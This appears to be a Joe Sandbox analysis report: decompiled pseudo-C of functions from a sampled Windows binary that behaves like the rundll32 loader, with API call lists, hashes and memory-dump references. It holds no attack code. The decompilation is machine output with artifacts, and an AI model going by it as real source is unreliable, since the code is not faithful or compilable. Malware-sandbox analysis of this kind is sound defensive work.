			E000C3938(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				short _v540;
				char _v541;
				char _v548;
				short _v552;
				struct _PROCESS_INFORMATION _v568;
				struct _STARTUPINFOW _v644;
				void* __edi;
				void* __esi;
				long _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				void* _t27;
				char* _t28;
				int _t29;
				WCHAR* _t30;
				int _t37;
				long _t38;
				void* _t43;
				void* _t47;
				int _t50;
				signed int _t51;

				_t47 = __edx;
				_t43 = __ebx;
				_v8 =  *0xc8018 ^ _t51;
				_t22 = E000C387E(__ecx); // executed
				_t49 = _t22;
				if(_t49 == 0) {
					L7:
					_t23 = 0;
				} else {
					_t27 = GetCurrentProcess();
					__imp__IsWow64Process2(_t27,  &_v552,  &_v548);
					if(_t27 == 0) {
						goto L7;
					} else {
						if(_v548 != _t49) {
							_t28 =  &_v541;
							__imp__RtlWow64IsWowGuestMachineSupported(_t49, _t28);
							if(_t28 < 0 || _v541 == 0) {
								goto L7;
							} else {
								_t29 =  &_v540;
								__imp__GetSystemWow64Directory2W(_t29, 0xf6, _t49);
								goto L5;
							}
						} else {
							if(_v552 == 0) {
								goto L7;
							} else {
								_t29 = GetSystemDirectoryW( &_v540, 0xf6);
								L5:
								if(_t29 == 0) {
									goto L7;
								} else {
									_t30 =  &_v540;
									__imp__PathCchAppend(_t30, 0x105, L"rundll32.exe");
									if(_t30 >= 0) {
										__imp__Wow64EnableWow64FsRedirection(0);
										_t50 = 0x44;
										memset( &_v644, 0, _t50);
										_v644.cb = _t50;
										_t37 = CreateProcessW( &_v540, GetCommandLineW(), 0, 0, 0, 0, 0, 0,  &_v644,  &_v568);
										_t49 = _t37;
										__imp__Wow64EnableWow64FsRedirection(1);
										if(_t37 == 0) {
											goto L7;
										} else {
											_t38 = WaitForSingleObject(_v568.hProcess, 0xffffffff);
											_t49 = _t38;
											CloseHandle(_v568);
											CloseHandle(_v568.hThread);
											if(_t38 != 0) {
												goto L7;
											} else {
												_t23 = 1;
											}
										}
									} else {
										goto L7;
									}
								}
							}
						}
					}
				}
				return E000C6160(_t23, _t43, _v8 ^ _t51, _t47, 0, _t49);
			}

0x000c3938
0x000c3938
0x000c394a
0x000c394f
0x000c3954
0x000c3958
0x000c39bd
0x000c39bd
0x000c395a
0x000c3968
0x000c396f
0x000c3977
0x00000000
0x000c3979
0x000c3980
0x000c39cf
0x000c39d7
0x000c39df
0x00000000
0x000c39ea
0x000c39f0
0x000c39f7
0x00000000
0x000c39f7
0x000c3982
0x000c398a
0x00000000
0x000c398c
0x000c3998
0x000c399e
0x000c39a0
0x00000000
0x000c39a2
0x000c39ac
0x000c39b3
0x000c39bb
0x000c3a02
0x000c3a0a
0x000c3a14
0x000c3a1c
0x000c3a44
0x000c3a4c
0x000c3a4e
0x000c3a56
0x00000000
0x000c3a5c
0x000c3a64
0x000c3a70
0x000c3a72
0x000c3a7e
0x000c3a86
0x00000000
0x000c3a8c
0x000c3a8e
0x000c3a8e
0x000c3a86
0x00000000
0x00000000
0x00000000
0x000c39bb
0x000c39a0
0x000c398a
0x000c3980
0x000c3977
0x000c39ce

APIs

Part of subcall function 000C387E: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 000C38A8
Part of subcall function 000C387E: memset.MSVCRT ref: 000C38BC
Part of subcall function 000C387E: ReadFile.KERNELBASE(00000000,?,00000040,?,00000000,00000000), ref: 000C38D3
Part of subcall function 000C387E: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000), ref: 000C38EE
Part of subcall function 000C387E: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,000000F8,?,00000000), ref: 000C390E
Part of subcall function 000C387E: FindCloseChangeNotification.KERNELBASE(00000000), ref: 000C3920

GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 000C3968
IsWow64Process2.API-MS-WIN-CORE-WOW64-L1-1-1(00000000), ref: 000C396F
GetSystemDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,000000F6), ref: 000C3998
PathCchAppend.API-MS-WIN-CORE-PATH-L1-1-0(?,00000105,rundll32.exe), ref: 000C39B3
RtlWow64IsWowGuestMachineSupported.NTDLL ref: 000C39D7
GetSystemWow64Directory2W.API-MS-WIN-CORE-WOW64-L1-1-1(?,000000F6,00000000), ref: 000C39F7
Wow64EnableWow64FsRedirection.API-MS-WIN-CORE-KERNEL32-PRIVATE-L1-1-0(00000000), ref: 000C3A02
memset.MSVCRT ref: 000C3A14
GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 000C3A36
CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000), ref: 000C3A44
Wow64EnableWow64FsRedirection.API-MS-WIN-CORE-KERNEL32-PRIVATE-L1-1-0(00000001), ref: 000C3A4E
WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF), ref: 000C3A64
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 000C3A72
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 000C3A7E

Strings

rundll32.exe, xrefs: 000C39A2

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: Wow64$File$Close$CreateEnableHandleProcessReadRedirectionSystemmemset$AppendChangeCommandCurrentDirectoryDirectory2FindGuestLineMachineNotificationObjectPathPointerProcess2SingleSupportedWait
String ID: rundll32.exe
API String ID: 191792154-3034741169
Opcode ID: 5e27ea37a7ec0fa4b251d7fa9cdaec81dcd9e9981cabb50e58300c6606ff190b
Instruction ID: 20f3007291633748f62373b49e89add6bd346d63ad585ea6afa7424fea0df778
Opcode Fuzzy Hash: 5e27ea37a7ec0fa4b251d7fa9cdaec81dcd9e9981cabb50e58300c6606ff190b
Instruction Fuzzy Hash: CC313272951129ABDB719BA0AC4DFEF77BCEB04710F0441D9F909D2160DB789B85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 000C371B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 117
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E000C371B(struct HINSTANCE__* __ecx, int __edx, void* _a4, intOrPtr _a8) {
				signed int _v8;
				void _v408;
				void _v1328;
				long _v1332;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t31;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t45;
				intOrPtr* _t48;
				void* _t52;
				void* _t53;
				void* _t54;
				signed int _t57;

				_t51 = __edx;
				_v8 =  *0xc8018 ^ _t57;
				_t41 = _a8;
				_t53 = _a4;
				_t54 = __ecx;
				_t24 = LoadStringW(__ecx, __edx,  &_v408, 0xc8); // executed
				if(_t24 == 0) {
					L12:
					return E000C6160(_t24, _t41, _v8 ^ _t57, _t51, _t53, _t54);
				}
				_push(_t41);
				if(E000C1F2B( &_v1328, 0x1cc,  &_v408, _t53) >= 0 && LoadStringW(_t54, 0x402,  &_v408, 0xc8) != 0) {
					_t24 =  *0xc83c8;
					if(_t24 != 1) {
						if(_t24 == 0) {
							_t24 =  *0xcb024(0,  &_v1328,  &_v408, 0x10);
						}
						goto L12;
					}
					_t53 = 0;
					_t24 = CreateFileW(L"CONOUT$", 0xc0000000, 3, 0, 3, 0, 0);
					_t8 = _t24 + 1; // 0x1
					asm("sbb esi, esi");
					_t54 =  ~_t8 & _t24;
					if(_t54 == 0) {
						goto L12;
					}
					_t45 =  &_v408;
					_t52 = _t45 + 2;
					do {
						_t31 =  *_t45;
						_t45 = _t45 + 2;
					} while (_t31 != 0);
					WriteConsoleW(_t54,  &_v408, _t45 - _t52 >> 1,  &_v1332, 0);
					WriteConsoleW(_t54, L": ", 2,  &_v1332, 0);
					_t48 =  &_v1328;
					_t51 = _t48 + 2;
					do {
						_t37 =  *_t48;
						_t48 = _t48 + 2;
					} while (_t37 != 0);
					WriteConsoleW(_t54,  &_v1328, _t48 - _t51 >> 1,  &_v1332, 0);
					_t24 = CloseHandle(_t54);
				}
			}

0x000c371b
0x000c372d
0x000c3731
0x000c373c
0x000c373f
0x000c3749
0x000c3751
0x000c386b
0x000c387b
0x000c387b
0x000c3757
0x000c3776
0x000c379c
0x000c37a4
0x000c3851
0x000c3865
0x000c3865
0x00000000
0x000c3851
0x000c37aa
0x000c37bd
0x000c37c3
0x000c37c8
0x000c37ca
0x000c37cc
0x00000000
0x00000000
0x000c37d2
0x000c37d8
0x000c37db
0x000c37db
0x000c37de
0x000c37e1
0x000c37fb
0x000c3811
0x000c3817
0x000c381d
0x000c3820
0x000c3820
0x000c3823
0x000c3826
0x000c3840
0x000c3847
0x000c3847

APIs

LoadStringW.USER32(?,?,?,000000C8), ref: 000C3749
LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000402,?,000000C8,?,000000C8), ref: 000C378E
CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(CONOUT$,C0000000,00000003,00000000,00000003,00000000,00000000,?,00000402,?,000000C8,?,000000C8), ref: 000C37BD
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000001,?,?,?,00000000,?,00000402,?,000000C8,?,000000C8), ref: 000C37FB
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000001,000C17E8,00000002,?,00000000,?,00000402,?,000000C8,?,000000C8), ref: 000C3811
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000001,?,?,?,00000000,?,00000402,?,000000C8,?,000000C8), ref: 000C3840
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000001,?,00000402,?,000000C8,?,000000C8), ref: 000C3847

Strings

CONOUT$, xrefs: 000C37B8

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: ConsoleWrite$LoadString$CloseCreateFileHandle
String ID: CONOUT$
API String ID: 258192622-3130406586
Opcode ID: db490148ccbccdfbc3f42bcb394a567e552ed1884a09c3a05d23297c60718b52
Instruction ID: bbde5b9efe0cc24348a442077a8ab53a33935210ffd947091b5b7e44deb50296
Opcode Fuzzy Hash: db490148ccbccdfbc3f42bcb394a567e552ed1884a09c3a05d23297c60718b52
Instruction Fuzzy Hash: 4531D3715006186BEB209B65CC5AFEF77BCEF45B01F048199FA09E6081DB309F4A8F60

Uniqueness

Uniqueness Score: -1.00%

Function 000C5F35 Relevance: 10.6, APIs: 7, Instructions: 132
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E000C5F35() {
				int _t26;
				signed int _t35;
				void* _t36;
				intOrPtr _t38;
				signed short* _t39;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				void* _t52;
				intOrPtr _t53;
				void* _t57;

				_push(0x5c);
				_push(0xc6c88);
				E000C683C(_t36, _t50, _t52);
				 *(_t57 - 0x20) = 0;
				GetStartupInfoW(_t57 - 0x6c);
				 *((intOrPtr*)(_t57 - 4)) = 0;
				_t53 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t51 = 0;
				while(1) {
					_t38 = _t53;
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t53) {
						Sleep(0x3e8);
						continue;
					} else {
						_t55 = 1;
						_t51 = 1;
					}
					L6:
					if( *0xc84e8 != _t55) {
						__eflags =  *0xc84e8;
						if(__eflags != 0) {
							 *0xc8034 = _t55;
							goto L12;
						} else {
							 *0xc84e8 = _t55;
							_t35 = E000C6106(_t38, 0xc11f8, 0xc1204); // executed
							__eflags = _t35;
							if(__eflags == 0) {
								goto L12;
							} else {
								goto L10;
							}
						}
					} else {
						_push(0x1f);
						L000C6634();
						L12:
						if( *0xc84e8 == _t55) {
							_push(0xc11f4);
							_push(0xc11d8); // executed
							L000C6836(); // executed
							 *0xc84e8 = 2;
						}
						if(_t51 == 0) {
							 *0xc84e4 = 0;
						}
						_t65 =  *0xc84f4;
						if( *0xc84f4 != 0 && E000C6690(_t65, 0xc84f4) != 0) {
							_t55 =  *0xc84f4;
							 *0xc9294(0, 2, 0);
							 *( *0xc84f4)();
						}
						_t39 =  *__imp___wcmdln;
						if(_t39 == 0) {
							L10:
							 *((intOrPtr*)(_t57 - 4)) = 0xfffffffe;
						} else {
							 *(_t57 - 0x24) = _t39;
							_t55 = 0x20;
							_t49 =  *(_t57 - 0x20);
							while(1) {
								_t26 =  *_t39 & 0x0000ffff;
								if(_t26 > _t55) {
									goto L32;
								}
								if(_t26 != 0) {
									if(_t49 != 0) {
										goto L32;
									} else {
										while(_t26 != 0 && _t26 <= _t55) {
											_t39 =  &(_t39[1]);
											 *(_t57 - 0x24) = _t39;
											_t26 =  *_t39 & 0x0000ffff;
										}
									}
								}
								__eflags =  *(_t57 - 0x40) & 0x00000001;
								if(( *(_t57 - 0x40) & 0x00000001) == 0) {
									_t26 = 0xa;
								} else {
									_t26 =  *(_t57 - 0x3c) & 0x0000ffff;
								}
								E000C3F9E(0xc0000, 0, _t39, _t26); // executed
								 *0xc8030 = _t26;
								__eflags =  *0xc8048;
								if( *0xc8048 == 0) {
									exit(_t26);
									goto L32;
								}
								__eflags =  *0xc8034;
								if( *0xc8034 == 0) {
									__imp___cexit();
								}
								 *((intOrPtr*)(_t57 - 4)) = 0xfffffffe;
								goto L38;
								L32:
								__eflags = _t26 - 0x22;
								if(_t26 == 0x22) {
									__eflags = _t49;
									_t15 = _t49 == 0;
									__eflags = _t15;
									_t49 = 0 | _t15;
									 *(_t57 - 0x20) = _t49;
								}
								_t39 =  &(_t39[1]);
								 *(_t57 - 0x24) = _t39;
							}
						}
					}
					L38:
					return E000C6884(0, _t51, _t55);
				}
				_t55 = 1;
				__eflags = 1;
				goto L6;
			}

0x000c5f35
0x000c5f37
0x000c5f3c
0x000c5f43
0x000c5f4a
0x000c5f50
0x000c5f59
0x000c5f5c
0x000c5f5e
0x000c5f63
0x000c5f67
0x000c5f6d
0x00000000
0x00000000
0x000c5f71
0x000c5f7f
0x00000000
0x000c5f73
0x000c5f75
0x000c5f76
0x000c5f76
0x000c5f8a
0x000c5f90
0x000c5f9c
0x000c5fa2
0x000c5fd0
0x00000000
0x000c5fa4
0x000c5fa4
0x000c5fb4
0x000c5fbb
0x000c5fbd
0x00000000
0x00000000
0x00000000
0x00000000
0x000c5fbd
0x000c5f92
0x000c5f92
0x000c5f94
0x000c5fd6
0x000c5fdc
0x000c5fde
0x000c5fe3
0x000c5fe8
0x000c5fef
0x000c5fef
0x000c5ffb
0x000c6004
0x000c6004
0x000c6006
0x000c600d
0x000c6022
0x000c602a
0x000c6030
0x000c6030
0x000c6037
0x000c603b
0x000c5fbf
0x000c5fbf
0x000c603d
0x000c603d
0x000c6042
0x000c6043
0x000c6046
0x000c6046
0x000c604c
0x00000000
0x00000000
0x000c6051
0x000c6055
0x00000000
0x00000000
0x000c6057
0x000c6061
0x000c6064
0x000c6067
0x000c6067
0x000c6057
0x000c6055
0x000c606c
0x000c6070
0x000c607a
0x000c6072
0x000c6072
0x000c6072
0x000c6083
0x000c6088
0x000c608d
0x000c6094
0x000c6097
0x00000000
0x000c6097
0x000c60e5
0x000c60ec
0x000c60ee
0x000c60f4
0x000c60f9
0x00000000
0x000c609d
0x000c609d
0x000c60a0
0x000c60a4
0x000c60a6
0x000c60a6
0x000c60a9
0x000c60ab
0x000c60ab
0x000c60ae
0x000c60b1
0x000c60b1
0x000c6046
0x000c603b
0x000c6100
0x000c6105
0x000c6105
0x000c5f89
0x000c5f89
0x00000000

APIs

GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,000C6C88,0000005C), ref: 000C5F4A
Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8), ref: 000C5F7F
_amsg_exit.MSVCRT ref: 000C5F94
_initterm.MSVCRT ref: 000C5FE8
__IsNonwritableInCurrentImage.LIBCMT ref: 000C6014
exit.MSVCRT ref: 000C6097

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_inittermexit
String ID:
API String ID: 2849151604-0
Opcode ID: d0908d4c33e47e2b2d8b4177ae90d33cdec6938f55ca9a8eff1f2f82c177f693
Instruction ID: 1148543d62fbdfc05cd9de7b2642bcf8a7fae9c9b02fcfd3e4e3027214bf347b
Opcode Fuzzy Hash: d0908d4c33e47e2b2d8b4177ae90d33cdec6938f55ca9a8eff1f2f82c177f693
Instruction Fuzzy Hash: 8241D074A407128FEBB89B64DC49FAE72F0BB04751F34402DE941AB2A1DF7A9C81C758

Uniqueness

Uniqueness Score: -1.00%

Function 000C387E Relevance: 9.1, APIs: 6, Instructions: 69
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E000C387E(WCHAR* __ecx) {
				signed int _v8;
				long _v16;
				void _v76;
				signed short _v320;
				void _v324;
				long _v328;
				void* __edi;
				void* __esi;
				void* _t13;
				int _t20;
				void* _t27;
				void* _t31;
				void* _t32;
				signed int _t33;
				signed int _t34;

				_v8 =  *0xc8018 ^ _t34;
				_t33 = 0;
				_t13 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t32 = _t13;
				if(_t32 != 0xffffffff) {
					memset( &_v76, 0, 0x40);
					_t20 = ReadFile(_t32,  &_v76, 0x40,  &_v328, 0); // executed
					if(_t20 != 0 && 0x5a4d == _v76 && SetFilePointer(_t32, _v16, 0, 0) != 0xffffffff && ReadFile(_t32,  &_v324, 0xf8,  &_v328, 0) != 0) {
						_t33 = _v320 & 0x0000ffff;
					}
					FindCloseChangeNotification(_t32); // executed
				}
				return E000C6160(_t33, _t27, _v8 ^ _t34, _t31, _t32, _t33);
			}

0x000c3890
0x000c3895
0x000c38a8
0x000c38ae
0x000c38b3
0x000c38bc
0x000c38d3
0x000c38db
0x000c3918
0x000c3918
0x000c3920
0x000c3920
0x000c3937

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 000C38A8
memset.MSVCRT ref: 000C38BC
ReadFile.KERNELBASE(00000000,?,00000040,?,00000000,00000000), ref: 000C38D3
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000), ref: 000C38EE
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,000000F8,?,00000000), ref: 000C390E
FindCloseChangeNotification.KERNELBASE(00000000), ref: 000C3920

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: File$Read$ChangeCloseCreateFindNotificationPointermemset
String ID:
API String ID: 2065208610-0
Opcode ID: 7f76d13fa937e71ea7ab9c8716e6d0a3e1a2dcbabe2ff81078c9eca299c7ac16
Instruction ID: 0b70ec760c6dd4ff702cf7b5e3857474a3bc75e1c74e49b11dfdca304b6b3ed5
Opcode Fuzzy Hash: 7f76d13fa937e71ea7ab9c8716e6d0a3e1a2dcbabe2ff81078c9eca299c7ac16
Instruction Fuzzy Hash: 89118171600128BAE7309B65DC48FFF7BBCEB45760F104258FA09E21D0D6748A45C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 000C3C8D Relevance: 6.1, APIs: 4, Instructions: 109
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E000C3C8D(int __edx, void* __eflags, short* _a4, short* _a8, intOrPtr* _a12, intOrPtr* _a16, char** _a20) {
				int _v8;
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				int _v20;
				intOrPtr _v24;
				struct HINSTANCE__* _t29;
				intOrPtr _t31;
				short _t37;
				int _t38;
				long _t39;
				int _t45;
				short* _t57;
				int _t64;
				short* _t65;
				short* _t67;
				char* _t70;
				short* _t72;

				_v12 =  *0xc83cc;
				_t72 = _a8;
				_t45 = 0;
				 *_a12 = 0;
				_t67 = _a4;
				_v20 = __edx;
				 *_a16 = 0;
				 *_a20 = 0;
				_t29 = E000C3A94(_v12, __edx); // executed
				_v16 = _t29;
				if(_t29 != 0) {
					_v8 = 0;
					_t31 = E000C3B92(_t29, _t67,  &_v8);
					_v24 = _t31;
					if(_t31 == 0) {
						_t72 = _v20;
						_t64 = 0x400;
						goto L12;
					} else {
						_t45 = 1;
						if(_v8 == 0 || _t72 == 0 ||  *_t72 == 0) {
							L9:
							 *_a12 = _v16;
							 *_a16 = _v24;
						} else {
							_t57 = _t72;
							_t65 =  &(_t57[1]);
							do {
								_t37 =  *_t57;
								_t57 =  &(_t57[1]);
							} while (_t37 != 0);
							_t38 = (_t57 - _t65 >> 1) + 1;
							_v20 = _t38;
							_t39 = WideCharToMultiByte(0, 0x400, _t72, _t38, 0, 0, 0, 0);
							_v8 = _t39;
							_t70 = LocalAlloc(0, _t39);
							if(_t70 == 0) {
								_t45 = 0;
								_t64 = 0x300;
								_t67 = 0;
								L12:
								E000C371B(_v12, _t64, _t72, _t67);
								FreeLibrary(_v16);
							} else {
								WideCharToMultiByte(0, 0x400, _t72, _v20, _t70, _v8, 0, 0);
								 *_a20 = _t70;
								goto L9;
							}
						}
					}
				}
				return _t45;
			}

0x000c3c9d
0x000c3ca7
0x000c3caa
0x000c3cac
0x000c3cb2
0x000c3cb5
0x000c3cb8
0x000c3cbd
0x000c3cc4
0x000c3cc9
0x000c3cce
0x000c3cd7
0x000c3cdf
0x000c3ce4
0x000c3ce9
0x000c3d78
0x000c3d7b
0x00000000
0x000c3cef
0x000c3cef
0x000c3cf4
0x000c3d5b
0x000c3d61
0x000c3d69
0x000c3d01
0x000c3d01
0x000c3d03
0x000c3d06
0x000c3d06
0x000c3d09
0x000c3d0c
0x000c3d19
0x000c3d24
0x000c3d27
0x000c3d2f
0x000c3d38
0x000c3d3c
0x000c3d6d
0x000c3d6f
0x000c3d74
0x000c3d80
0x000c3d85
0x000c3d8e
0x000c3d3e
0x000c3d50
0x000c3d59
0x00000000
0x000c3d59
0x000c3d3c
0x000c3cf4
0x000c3ce9
0x000c3d9c

APIs

Part of subcall function 000C3A94: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 000C3AB5
Part of subcall function 000C3A94: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000008), ref: 000C3AC1

Part of subcall function 000C3B92: _wtoi.MSVCRT ref: 000C3BC4
Part of subcall function 000C3B92: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?), ref: 000C3BD0

WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000400,?,?,00000000,00000000,00000000,00000000), ref: 000C3D27
LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000), ref: 000C3D32
WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000400,?,?,00000000,00000000,00000000,00000000), ref: 000C3D50
FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?), ref: 000C3D8E

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: ByteCharLibraryMultiWide$AddressAllocErrorFreeLastLoadLocalProc_wtoi
String ID:
API String ID: 1343397253-0
Opcode ID: 836a1150390f7b8a87a420ef3d560b5fab99b43cac6a04b27aa87549612236fb
Instruction ID: d5525111c5e57d2244cf3eaff934bb1c44bb5aff6b93ea13e063020ac0850962
Opcode Fuzzy Hash: 836a1150390f7b8a87a420ef3d560b5fab99b43cac6a04b27aa87549612236fb
Instruction Fuzzy Hash: 44313FB5A00205AFDB14CFA9D844EAFB7F9EF89710B14805DE90697350DB309E01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 000C5F00 Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wgetmainargs.KERNELBASE ref: 000C5F24

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: __wgetmainargs
String ID:
API String ID: 1709950718-0
Opcode ID: c1e4700d41aaa9ebe72914120a80b313a49ed9a5a1aec276fec8691b4e4bcd0b
Instruction ID: d1e8a8b8bd889e1003314256691d0be778d14cae148a2f1b0418cb37fda2896f
Opcode Fuzzy Hash: c1e4700d41aaa9ebe72914120a80b313a49ed9a5a1aec276fec8691b4e4bcd0b
Instruction Fuzzy Hash: CAD0C9B16C1740EBB6E09B24AD06E093A60A384B50F22C058B70099172DE7D81188B1D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000C6783 Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000C6783() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0xc8018;
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0xc8018 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0xc8018 = _t39;
				}
				_t37 =  !_t36;
				 *0xc801c = _t37;
				return _t37;
			}

0x000c678b
0x000c678f
0x000c6793
0x000c67a6
0x000c67b0
0x000c67bc
0x000c67c5
0x000c67ce
0x000c67df
0x000c67e6
0x000c67f2
0x000c67f5
0x000c67f9
0x000c6803
0x000c6808
0x000c6808
0x000c680a
0x000c680a
0x000c6810
0x000c6813
0x000c681c

APIs

GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 000C67B0
GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 000C67BF
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 000C67C8
GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 000C67D1
QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 000C67E6

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

